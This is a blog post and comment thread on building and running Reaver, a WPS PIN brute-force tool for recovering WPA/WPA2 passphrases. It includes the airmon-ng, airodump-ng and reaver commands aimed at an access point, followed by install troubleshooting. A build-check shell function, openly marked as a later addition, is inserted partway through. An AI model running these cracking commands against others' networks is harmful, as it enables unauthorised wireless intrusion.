Hello internet,
I've been hearing all about this tool "Reaver":
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
1) Download (I downloaded the latest tar.gz, 1.2)
2) Ungzip, untar: `tar xvfz reaver-1.2.tar.gz`
3) Install dependencies: `sudo apt-get install libpcap-dev`
*NOTE* -- It seems like it may also depend on sql-lite ... or something, this is from the comments:
3a.) `sudo apt-get install libsqlite3-dev`
4) config, make install:
`./configure`
`make`
`sudo make install`
5) Now type `reaver` at the command line to see usage :)
You'll also probably want the aircrack-ng suite if you haven't done any wifi cracking/recon/diddling before...
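Commenters below report two failures at step 4: `./configure` returning Permission Denied, and `pcap library not found!` that went away once libsqlite3-dev was installed. The following is an added example, not part of the original post or of the Reaver project, that checks for both before building; the function name, its arguments and the `/usr/include` default are assumptions.

```shell
#!/bin/sh
# Added example: pre-build check for the failures reported in the comments.
# Usage (after sourcing this file): check_build_env /path/to/dir/with/configure

# check_build_env SRC_DIR [INCLUDE_DIR]
# Prints one line per problem with a suggested fix; returns the problem count.
check_build_env() {
    src_dir=$1
    inc_dir=${2:-/usr/include}   # assumed header location on Ubuntu
    problems=0

    if [ ! -f "$src_dir/configure" ]; then
        echo "configure not found in $src_dir (wrong directory?)"
        problems=$((problems + 1))
    elif [ ! -x "$src_dir/configure" ]; then
        # This is what produces "Permission denied"; the execute bit is
        # missing, so running the build as root is not the fix.
        echo "configure is not executable: chmod a+x $src_dir/configure"
        problems=$((problems + 1))
    fi

    # header:package pairs for the two dependencies named in the post.
    for pair in pcap.h:libpcap-dev sqlite3.h:libsqlite3-dev; do
        header=${pair%%:*}
        package=${pair##*:}
        if [ ! -f "$inc_dir/$header" ]; then
            echo "$header missing: sudo apt-get install $package"
            problems=$((problems + 1))
        fi
    done

    return "$problems"
}
```

A return value of 0 means `./configure`, `make` and `sudo make install` can proceed; only the install step needs root.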
~NOW~
I'm going to just type out what I'm doing as I go along to actually use reaver.
1) `sudo airodump-ng eth1` checking the BSSIDs and looking for my WPA2 AP.
2) `sudo airmon-ng start eth1`
3) exit, then open reaver `sudo reaver -i eth1 -b 00:11:22:33:44:55 -c 11 -vv`
Now... I'm not sure if it's doing its magick, I'll check wireshark soon, and maybe read the paper about the vulnerability, but I'm in script kiddie mode at the moment.
*edit*
It wasn't doing its magic. My card doesn't support packet INJECTION, oh well maybe someday I'll get a real man's wifi interface.
Good luck!
Also here's someone actually running the attack:

Nice ... It worked fine ...
I'm running Ubuntu 11.10 32bit on a 4 gig flashdrive and I cannot get it to configure. When I type ./configure it comes back with Permission Denied. I am in the proper directory when I run the command and yes it's all extracted proper as well.
Any thoughts?
Try to run the commands as root
sudo ./configure
sudo make
sudo make install
it will ask you for your password. Enter your password and press enter.
NOTE : if you boot from USB/DVD you do not have a password so just press "Enter"
the secret is:
chmod a+x configure
When I try to do this on an Ubuntu live CD running, I get:
checking for pcap_open_live in -lpcap... no
error: pcap library not found!
Apt-get claims that libpcap-dev is in its newest version.
I'm not sure what you could do, I know there's probably more examples (or will work) with a different live CD (more security oriented) like Backtrack or something.
If "locate" is installed you could do something like `locate pcap.h` and copy the directory into the make file where it says something like gcc/g++ -I/usr/lib/pcap1.66/
I don't know this is all off the top of my head, gl
also what step are you getting that error? ./configure or make?
I'm not the same person who asked first. I have the same error when I do configure. I have already installed the libpcap-dev but the error is still there
Same error here. Is in ./configure step, when it tries to detect if all necessary libraries are present.
OK, i solved the issue: just run: sudo apt-get install libsqlite3-dev
Then, try ./configure and all should be OK.
I'll add that to the post, thanks for taking the time to help out the community.
E: Unable to lock the download directory
sudo or look at the other comments above
you guys are speaking gibberish to me. i don't know how to do the .configure and this is really frustrating. i tried executing the configure script in the terminal but it doesn't do anything. i've tried entering all the stuff into the terminal, arg, i'm a noob..
lol :)
Ok well it's a good idea to learn about what each thing is doing. sudo is a command that gives the next commands higher (root) privileges on the system.
Also it's not .configure, it's ./configure. The ./ means to the computer "look in the current directory for the file that's after the slash and try to execute it". ./configure should execute the file in the directory you're in.
If you aren't familiar with "directory traversal" do that! It should be something to learn before doing anything else! Commands like `ls` (lists files/directories) and `cd` (change directory). Tab completion is also very useful. Say you download and extract the tar (tape archive, it's an old term from when files were stored on tapes) file, you can type cd reav and the bash should complete the file name so you don't have to painfully type each character out.
Anyway... hard to know where you are going wrong! Hope that's no gibberish above, I'd like to look at myself as a good teacher :p
"cd reav[tab]"**